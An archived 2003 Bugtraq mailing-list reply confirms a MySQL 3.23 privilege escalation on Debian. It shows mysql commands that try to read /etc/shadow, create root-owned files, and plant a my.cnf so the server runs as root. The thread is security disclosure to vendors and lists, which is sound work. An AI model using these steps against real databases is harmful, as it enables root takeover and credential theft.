[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <3E6CC7CC.3020307@nfg.nl>
Date: Mon, 10 Mar 2003 18:13:48 +0100
From: "Guido A.J. Stevens" <gyst@....nl>
To: "bugsman@...ero.it" <bugsman@...ero.it>
Cc: bugtraq <bugtraq@...urityfocus.com>, bugs@...ts.mysql.com,
security@...ian.org
Subject: Re: MySQL user can be changed to root
I can confirm this privilege escalation in mysql-server 3.23.49-8.2
(debian/stable on linux/i386). Any mysql user with file privileges can trick
the mysql server into running as root on restart of the mysql subsystem.
Note that mysql prevents you from reading non-world-readable files outside
the mysql data directory, or overwriting existing files. You can create new
files as root, though.
mysql> load data infile '/etc/shadow' into table readtext;
ERROR 1085: The file '/etc/shadow' must be in the database directory or be
readable by all
mysql> select * into outfile '/etc/somenewfile' from hack;
Query OK, 2 rows affected (0.00 sec)
-rw-rw-rw- 1 root root 19 Mar 10 17:22 /etc/somenewfile
Not a rootshell, yet, but lots of new avenues from here.
:*CU#
bugsman@...ero.it wrote:
> mysql>SELECT * INTO OUTFILE '/path/to/mysql/datadir/my.cnf' FROM hack
> Now, when the mysql server will be restarted, the user option in our
> datadir my.cnf will override the one in /etc/my.cnf and mysql server will
> run as root
--
*** Guido A.J. Stevens *** mailto:obfuscated ***
*** NFG Net Facilities Group BV *** tel: +31.43.3618933 ***
*** Postbus 1143 *** fax: +31.43.3561655 ***
*** 6201 BC Maastricht *** http://www.nfg.nl ***
... merging human DNA with cow eggs, creating a human-cow embryo. A
Chinese scientist is working with human-rabbit combinations. Cow and
rabbit eggs are far cheaper than human eggs ...
[ http://www.latimes.com/news/nationworld/nation/la-051202patent.story ]
---------------------------------------------------------------------
Before posting, please check:
http://www.mysql.com/manual.php (the manual)
http://lists.mysql.com/ (the list archive)
To request this thread, e-mail bugs-thread13932@...ts.mysql.com
To unsubscribe, e-mail <bugs-unsubscribe@...ts.mysql.com>
Powered by blists - more mailing lists